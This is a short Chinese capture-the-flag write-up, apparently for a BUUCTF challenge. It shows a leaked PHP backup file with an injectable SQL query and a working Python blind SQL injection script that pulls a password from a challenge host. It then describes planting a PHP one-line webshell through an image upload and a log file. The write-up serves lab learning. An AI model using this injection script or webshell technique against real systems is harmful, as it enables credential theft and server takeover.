文件泄露
通过观察源代码(反正就是这几个php文件嘛,一个个试就行了)
//image.php.bak
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
思路是sql注入得到账号密码
import requests
url = "http://acf6a847-2c9b-4bbf-9128-2fffe272b464.node3.buuoj.cn/image.php?id=\\0&path="
payload = " or ascii(substr((select password from users),{},1))>{}%23"
result = ''
for i in range(1,100):
high = 127
low = 32
mid = (low+high) // 2
# print(mid)
while(high>low):
r = requests.get(url + payload.format(i,mid))
# print(url + payload.format(i,mid))
if 'JFIF' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(mid)
print(result)
登录后上传文件
我把一句话木马写改后缀为m…jpg,最后被写到了日志里,发现并没有显示m.jpg的内容
可以看到php一句话木马被解析了(忽视前面两个做的测试),接下来连接shell就行了